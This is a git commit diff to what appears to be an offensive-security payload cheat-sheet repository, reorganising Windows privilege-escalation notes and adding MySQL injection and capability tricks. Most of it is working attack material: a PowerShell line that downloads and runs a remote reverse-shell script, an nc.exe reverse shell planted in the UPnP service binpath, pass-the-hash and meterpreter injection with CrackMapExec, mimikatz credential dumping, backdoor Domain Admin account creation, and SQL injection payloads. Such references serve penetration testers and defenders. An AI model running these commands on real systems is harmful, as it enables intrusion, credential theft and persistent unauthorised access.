SQL informationschema.processlist + UPNP warning + getcap -ep

2019-05-25 18:19:08 +02:00 · 2019-05-25 18:19:08 +02:00 · f88da43e1c
parent b1a05d1aab
commit f88da43e1c
7 changed files with 84 additions and 60 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -22,11 +22,6 @@
  * [Trust relationship between domains](#trust-relationship-between-domains)
  * [PrivExchange attack](#privexchange-attack)
  * [Password spraying](#password-spraying)
 * [Privilege Escalation](#privilege-escalation)
  * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato)
  * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
  * [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
  * [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
 ## Tools
@ -56,6 +51,7 @@
  git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
  crackmapexec smb -L
  crackmapexec smb -M name_module -o VAR=DATA
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
@ -598,56 +594,6 @@ Most of the time the best passwords to spray are :
 - $Companyname1
 ## Privilege Escalation
 ### PrivEsc Local Admin - Token Impersonation (RottenPotato)
 Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
 ```c
 getuid
 getprivs
 use incognito
 list\_tokens -u
 cd c:\temp\
 execute -Hc -f ./rot.exe
 impersonate\_token "NT AUTHORITY\SYSTEM"
 ```
 ```powershell
 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 Check if the patch is installed : `wmic qfe list | find "3139914"`
 ```powershell
 Powershell:
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
 Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
 ### PrivEsc Local Admin - MS17-010 (Eternal Blue)
 ```c
 nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
 ```
 ### From Local Admin to Domain Admin
 ```powershell
 net user hacker2 hacker123 /add /Domain
 net group "Domain Admins" hacker2 /add /domain
 ```
 ## References
 * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
--- a/Resources/Linux
+++ b/Resources/Linux
@ -242,6 +242,14 @@ sudo chmod +s /tmp/suid # setuid bit
 ### Interesting capabilities
 Having the capability =ep means the binary has all the capabilities.
 ```powershell
 $ getcap openssl /usr/bin/openssl 
 openssl=ep
 ```
 Alternatively the following capabilities can be used in order to upgrade your current privileges.
 ```powershell
 cap_dac_read_search # read anything
 cap_setuid+ep # setuid
--- a/Resources/Metasploit
+++ b/Resources/Metasploit
@ -153,7 +153,9 @@ execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w
 load mimikatz
 mimikatz_command -f version
 mimikatz_command -f samdump::hashes
 mimikatz_command -f sekurlsa::wdigest
 mimikatz_command -f sekurlsa::searchPasswords
 mimikatz_command -f sekurlsa::logonPasswords full
 ```
 ```powershell
--- a/Resources/Windows
+++ b/Resources/Windows
@ -15,6 +15,10 @@
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
 * [EoP - Runas](#eop---runas)
 * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
  * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
  * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
  * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
 ## Tools
@ -421,9 +425,12 @@ You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify
 ### Example with Windows XP SP1
 ```powershell
-$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
+# NOTE: spaces are mandatory for this exploit to work !
-sc config upnphost obj=".\LocalSystem" password=""
+sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
 sc config upnphost obj= ".\LocalSystem" password= ""
 sc qc upnphost
 sc config upnphost depend= ""
 net start upnphost
 ```
 If it fails because of a missing dependency, try the following commands.
@ -586,6 +593,52 @@ $ computer = "<hostname>"
 ```
 ## EoP - Common Vulnerabilities and Exposure
 ### Token Impersonation (RottenPotato)
 Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
 ```c
 getuid
 getprivs
 use incognito
 list\_tokens -u
 cd c:\temp\
 execute -Hc -f ./rot.exe
 impersonate\_token "NT AUTHORITY\SYSTEM"
 ```
 ```powershell
 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 Check if the patch is installed : `wmic qfe list | find "3139914"`
 ```powershell
 Powershell:
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
 Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
 ### MS17-010 (Eternal Blue)
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
 ```
 ## References
--- a/Resources/Windows
+++ b/Resources/Windows
@ -3,9 +3,10 @@
 ## TIP 1 - Create your credential :D
 ```powershell
-net user hacker hacker /add
+net user hacker hacker1234* /add
 net localgroup administrators hacker /add
-net group "Domain Admins" hacker /ADD /DOMAIN
+net localgroup "Remote Desktop Users" hacker /add
 net group "Domain Admins" hacker /add /domain
 ```
 Some info about your user
--- a/Redirect/README.md
+++ b/Redirect/README.md
@ -165,6 +165,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
 ## References
 * filedescriptor
 * [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
 * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
 * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
--- a/Injection/MySQL
+++ b/Injection/MySQL
@ -19,6 +19,7 @@
    * [MYSQL Blind with LIKE](#mysql-blind-with-like)
 * [MYSQL Time Based](#mysql-time-based)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
 * [MYSQL Current queries](#mysql-current-queries)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
 * [MYSQL UDF command execution](#mysql-udf-command-execution)
@ -223,6 +224,17 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
 ```
 ## MYSQL Current queries
 This table can list all operations that DB is performing at the moment.
 ```sql
 union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
 -- Dump in one shot example for the table content.
 union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 #
 ```
 ## MYSQL Read content of a file
 Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
@ -305,4 +317,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
 - [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
 - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
 - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
+- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
 - [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)